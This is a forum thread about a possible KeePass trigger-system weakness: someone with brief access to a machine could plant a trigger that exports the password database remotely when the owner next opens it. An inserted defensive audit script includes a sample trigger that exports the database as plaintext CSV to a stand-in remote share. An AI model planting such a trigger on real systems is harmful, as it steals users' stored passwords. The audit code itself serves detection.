
Potential security issue with trigger system.

Anonymous
2010-10-27
2012-11-20
  • Anonymous

    Anonymous - 2010-10-27

    I do not know if this has been discussed before and do not care to search, but I wanted to let everyone know that it would be easy for anyone to get a copy of your database by using the trigger system to export your currently opened database to a remote location. The trigger system makes this task way too easy for anyone that wants to do it, and since you do not even have to be logged in to any database to set up triggers, you could just set up the trigger and wait for the owner of the database to open it one time, and in theory all of the passwords contained in that database would be exported to the location they set up in the trigger.

    This is just a theory and I have not tested it, but it looks like the system is set up in such a way that would allow this to happen, if my understanding of the application is correct. I would like to hear others' opinions on this topic, and if this is possible then an easy fix would simply be to lock the entire application down (settings windows and all) until you have successfully opened a database.

    I think this should be done anyway, simply for the fact that anyone could change the program's options without even opening a database, which could cause potential problems in itself.

    Cheers,
    What.
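
The scenario described in this post (a trigger created while no database is open, firing on the owner's next open and writing the database somewhere else) is something a defender can audit for before trusting a shared machine. The script below is an added example and is not KeePass code: the XML layout, the element names, and the event and action type names are assumptions modelled loosely on a KeePass.config.xml-style trigger store, and the sample configuration is constructed for the demonstration. It flags enabled triggers whose write-type actions either point at a remote destination (UNC share or URL) or fire on a database-open event.

```python
"""Audit a trigger configuration for triggers that could copy an unlocked
database off the machine.  Added example; element/type names are assumed."""
import xml.etree.ElementTree as ET

# Constructed sample (not a real config): one benign backup trigger that
# runs after save, and one trigger that exports the database on open.
SAMPLE_CONFIG = r"""<Configuration>
  <Application>
    <TriggerSystem>
      <Triggers>
        <Trigger>
          <Name>Backup after save</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeName>SavedDatabaseFile</TypeName></Event></Events>
          <Actions>
            <Action>
              <TypeName>CopyFile</TypeName>
              <Parameters>
                <Parameter>{DB_PATH}</Parameter>
                <Parameter>{DB_DIR}\backup.kdbx</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
        <Trigger>
          <Name>Quiet export</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeName>OpenedDatabaseFile</TypeName></Event></Events>
          <Actions>
            <Action>
              <TypeName>ExportActiveDatabase</TypeName>
              <Parameters>
                <Parameter>\\remote-host\share\copy.csv</Parameter>
                <Parameter>Plain text CSV</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>"""

# Action types that write database content somewhere (names are assumptions).
WRITE_ACTIONS = {"ExportActiveDatabase", "CopyFile", "ExecuteCommandLine"}
# Events raised when the owner unlocks a database (name is an assumption).
OPEN_EVENTS = {"OpenedDatabaseFile"}


def is_remote_destination(path: str) -> bool:
    """True for a UNC share or any URL scheme: data would leave the machine."""
    return path.startswith("\\\\") or "://" in path


def find_risky_triggers(xml_text: str) -> list:
    """Return one finding per enabled trigger/action pair that either writes
    to a remote destination (high) or writes anything on database open (medium)."""
    root = ET.fromstring(xml_text)
    findings = []
    for trig in root.iterfind("./Application/TriggerSystem/Triggers/Trigger"):
        if trig.findtext("Enabled", "true").strip().lower() != "true":
            continue  # a disabled trigger cannot fire
        name = trig.findtext("Name", "")
        events = {e.findtext("TypeName", "") for e in trig.iterfind("Events/Event")}
        for act in trig.iterfind("Actions/Action"):
            kind = act.findtext("TypeName", "")
            if kind not in WRITE_ACTIONS:
                continue
            params = [p.text or "" for p in act.iterfind("Parameters/Parameter")]
            if any(is_remote_destination(p) for p in params):
                severity = "high"
            elif events & OPEN_EVENTS:
                severity = "medium"
            else:
                continue  # local write on a non-open event: ordinary backup
            findings.append({"trigger": name, "action": kind,
                             "severity": severity, "parameters": params})
    return findings


if __name__ == "__main__":
    for f in find_risky_triggers(SAMPLE_CONFIG):
        print(f"[{f['severity']}] trigger '{f['trigger']}' runs {f['action']} "
              f"with parameters {f['parameters']}")
```

Run against a real configuration, the check belongs alongside the mitigation the post suggests: if settings cannot be changed while no database is unlocked, a trigger of this shape cannot be planted in the first place, and a periodic audit of the stored triggers catches any that were added while the settings were open.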

  • Paul

    Paul - 2010-10-28

    Thanks for not bothering to check if this has been discussed!

    Any machine that is compromised to the point of being able to write to files at will, has already had all information worth gathering stolen.

    cheers, Paul

  • Anonymous

    Anonymous - 2010-10-28

    If you had any clue as to what I was talking about you might have been able to formulate a better response. I will help you out in this endeavor, however. I am NOT talking about a machine that has been compromised. I am simply talking about an everyday scenario where you let someone use your computer for 5 minutes to send an email to a friend. People do this ALL THE TIME, and if the person you are giving temporary access to decides to do what I stated above (and your reply confirms it's possible) then this could lead to your passwords being stolen. THIS IS A SECURITY ISSUE THAT NEEDS TO BE ADDRESSED AND IS EASILY FIXABLE.

    I do not know who the authors of this application are, but you seem to be taking a defensive stance on the issue, so I will assume you are one of them. So here is my advice to you or anyone who does work on this application: stop turning a blind eye to the obvious shortcomings of this application and just fix the problems. It's an easy fix, and anyone with even a small measure of intelligence and coding experience could fix this problem in 10 minutes. If you do not have anything to do with the development of this application then do us both a favor and do not reply to topics that 1.) you cannot understand, and 2.) you cannot do anything about.

    Cheers, What

  • Gordon Rogier

    Gordon Rogier - 2010-10-28

    Sorry.. but I have to speak up a bit here. As I am just a simple user of KeePass, it is clear to me from a couple of postings this week on various threads that KeePass is clearly getting leveraged by more people every day… and as part of that, it is clear that higher levels of "auditing" and "expectations" are being desired.

    Now with this said, I honestly have to say.. it sure appears to me that those with critical (and yes, hopefully constructive critical) feedback do not appear to have taken time to support this quite effective product with $$. I really think a person really should be ready to support this product with more than just forum "feedback".

  • mranybody

    mranybody - 2010-10-29

    @grogier

    Well said. Some concrete support for Dominik is the way to go.

    I'm told that 'HuhWhat's' style of approach is known as "professional auditing"!!!! ….. (5th post) ……
